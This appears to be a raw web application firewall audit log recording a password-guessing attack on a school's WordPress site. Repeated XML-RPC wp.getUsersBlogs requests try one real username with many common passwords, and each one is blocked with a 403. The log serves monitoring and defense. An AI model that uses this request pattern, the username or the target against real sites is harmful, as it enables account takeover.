[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071955684190 4492 (- - -) Stopwatch2: 1745071955684190 4492; combined=3371, p1=388, p2=2708, p3=0, p4=0, p5=180, sr=82, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fdafd16-Z-- --04dbc72e-A-- [19/Apr/2025:21:13:38 +0700] aAOvkuvDiFC_ir7MDwbkbwAAAE8 103.236.140.4 51422 103.236.140.4 8181 --04dbc72e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --04dbc72e-C-- wp.getUsersBlogs wakahumas liverpool1 --04dbc72e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04dbc72e-E-- --04dbc72e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072018743807 4952 (- - -) Stopwatch2: 1745072018743807 4952; combined=3659, p1=443, p2=3007, p3=0, p4=0, p5=119, sr=83, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04dbc72e-Z-- --738c2537-A-- [19/Apr/2025:21:14:41 +0700] aAOv0Q6cTFSgLAHl7PrX1AAAABc 103.236.140.4 54250 103.236.140.4 8181 --738c2537-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --738c2537-C-- wp.getUsersBlogs wakahumas dancer --738c2537-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --738c2537-E-- --738c2537-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072081089971 16997 (- - -) Stopwatch2: 1745072081089971 16997; combined=27406, p1=515, p2=3070, p3=0, p4=0, p5=11924, sr=154, sw=72, l=0, gc=11825 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --738c2537-Z-- --d22a7526-A-- [19/Apr/2025:21:15:41 +0700] aAOwDUruoUXZj665VUH2pgAAANU 103.236.140.4 56536 103.236.140.4 8181 --d22a7526-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d22a7526-C-- wp.getUsersBlogs wakahumas marketing2021 --d22a7526-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d22a7526-E-- --d22a7526-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072141673374 4836 (- - -) Stopwatch2: 1745072141673374 4836; combined=3786, p1=430, p2=3187, p3=0, p4=0, p5=100, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d22a7526-Z-- --5362115a-A-- [19/Apr/2025:21:16:41 +0700] aAOwSUruoUXZj665VUH36AAAANE 103.236.140.4 59528 103.236.140.4 8181 --5362115a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5362115a-C-- wp.getUsersBlogs wakahumas smkn22-jkt_sch_id --5362115a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5362115a-E-- --5362115a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072201702478 4583 (- - -) Stopwatch2: 1745072201702478 4583; combined=3190, p1=401, p2=2649, p3=0, p4=0, p5=83, sr=82, sw=57, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5362115a-Z-- --da772d61-A-- [19/Apr/2025:21:17:49 +0700] aAOwjevDiFC_ir7MDwbmxQAAAFg 103.236.140.4 35610 103.236.140.4 8181 --da772d61-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --da772d61-C-- wp.getUsersBlogs wakahumas PASS --da772d61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da772d61-E-- --da772d61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072269971801 5060 (- - -) Stopwatch2: 1745072269971801 5060; combined=3617, p1=459, p2=2988, p3=0, p4=0, p5=101, sr=86, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da772d61-Z-- --a8463b07-A-- [19/Apr/2025:21:18:49 +0700] aAOwyUruoUXZj665VUH6wQAAAMM 103.236.140.4 41708 103.236.140.4 8181 --a8463b07-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a8463b07-C-- wp.getUsersBlogs wakahumas playboy --a8463b07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8463b07-E-- --a8463b07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072329151305 5600 (- - -) Stopwatch2: 1745072329151305 5600; combined=3735, p1=449, p2=3082, p3=0, p4=0, p5=122, sr=78, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8463b07-Z-- --dfe49e5d-A-- [19/Apr/2025:21:19:56 +0700] aAOxDHNa4dA2HllpK_OAegAAAIw 103.236.140.4 48494 103.236.140.4 8181 --dfe49e5d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dfe49e5d-C-- wp.getUsersBlogs wakahumas london12 --dfe49e5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfe49e5d-E-- --dfe49e5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072396606736 7703 (- - -) Stopwatch2: 1745072396606736 7703; combined=5811, p1=662, p2=4922, p3=0, p4=0, p5=132, sr=117, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfe49e5d-Z-- --ecbe990c-A-- [19/Apr/2025:21:20:56 +0700] aAOxSEruoUXZj665VUH9-wAAAMg 103.236.140.4 54664 103.236.140.4 8181 --ecbe990c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ecbe990c-C-- wp.getUsersBlogs wakahumas 123qwe --ecbe990c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecbe990c-E-- --ecbe990c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072456055336 4054 (- - -) Stopwatch2: 1745072456055336 4054; combined=2791, p1=358, p2=2303, p3=0, p4=0, p5=78, sr=73, sw=52, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecbe990c-Z-- --7a5c7e0b-A-- [19/Apr/2025:21:21:56 +0700] aAOxhA6cTFSgLAHl7PrhWAAAAAM 103.236.140.4 32810 103.236.140.4 8181 --7a5c7e0b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7a5c7e0b-C-- wp.getUsersBlogs wakahumas 123789 --7a5c7e0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a5c7e0b-E-- --7a5c7e0b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072516214770 4159 (- - -) Stopwatch2: 1745072516214770 4159; combined=3061, p1=368, p2=2542, p3=0, p4=0, p5=90, sr=76, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a5c7e0b-Z-- --e8300f0b-A-- [19/Apr/2025:21:22:56 +0700] aAOxwHNa4dA2HllpK_OEqwAAAJM 103.236.140.4 39046 103.236.140.4 8181 --e8300f0b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e8300f0b-C-- wp.getUsersBlogs wakahumas P@SSWORD --e8300f0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8300f0b-E-- --e8300f0b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (44+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072576257633 4227 (- - -) Stopwatch2: 1745072576257633 4227; combined=3288, p1=386, p2=2758, p3=0, p4=0, p5=86, sr=78, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8300f0b-Z-- --22ae3d7b-A-- [19/Apr/2025:21:24:02 +0700] aAOyAkruoUXZj665VUEDGgAAAMw 103.236.140.4 45930 103.236.140.4 8181 --22ae3d7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --22ae3d7b-C-- wp.getUsersBlogs wakahumas 4444 --22ae3d7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22ae3d7b-E-- --22ae3d7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072642197079 3997 (- - -) Stopwatch2: 1745072642197079 3997; combined=2699, p1=358, p2=2174, p3=0, p4=0, p5=100, sr=79, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22ae3d7b-Z-- --3623c753-A-- [19/Apr/2025:21:25:02 +0700] aAOyPkruoUXZj665VUEEngAAANc 103.236.140.4 52176 103.236.140.4 8181 --3623c753-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3623c753-C-- wp.getUsersBlogs wakahumas 2003 --3623c753-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3623c753-E-- --3623c753-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072702289801 6027 (- - -) Stopwatch2: 1745072702289801 6027; combined=4123, p1=615, p2=3328, p3=0, p4=0, p5=106, sr=96, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3623c753-Z-- --ac967a70-A-- [19/Apr/2025:21:26:04 +0700] aAOyfEruoUXZj665VUEGFgAAAMQ 103.236.140.4 58600 103.236.140.4 8181 --ac967a70-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ac967a70-C-- wp.getUsersBlogs wakahumas 123ewq --ac967a70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac967a70-E-- --ac967a70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072764548935 4797 (- - -) Stopwatch2: 1745072764548935 4797; combined=3407, p1=430, p2=2817, p3=0, p4=0, p5=94, sr=85, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac967a70-Z-- --13fe9d01-A-- [19/Apr/2025:21:27:08 +0700] aAOyvOvDiFC_ir7MDwb0PgAAAFY 103.236.140.4 36888 103.236.140.4 8181 --13fe9d01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --13fe9d01-C-- wp.getUsersBlogs wakahumas power123445 --13fe9d01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13fe9d01-E-- --13fe9d01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072828928792 5155 (- - -) Stopwatch2: 1745072828928792 5155; combined=3863, p1=476, p2=3212, p3=0, p4=0, p5=102, sr=88, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13fe9d01-Z-- --1dd66152-A-- [19/Apr/2025:21:28:09 +0700] aAOy-UruoUXZj665VUEJuAAAANE 103.236.140.4 43040 103.236.140.4 8181 --1dd66152-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1dd66152-C-- wp.getUsersBlogs wakahumas zxcvb --1dd66152-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dd66152-E-- --1dd66152-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072889377846 5255 (- - -) Stopwatch2: 1745072889377846 5255; combined=3829, p1=512, p2=3140, p3=0, p4=0, p5=104, sr=93, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dd66152-Z-- --8d34a419-A-- [19/Apr/2025:21:29:12 +0700] aAOzOA6cTFSgLAHl7Prs3AAAABg 103.236.140.4 49490 103.236.140.4 8181 --8d34a419-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: 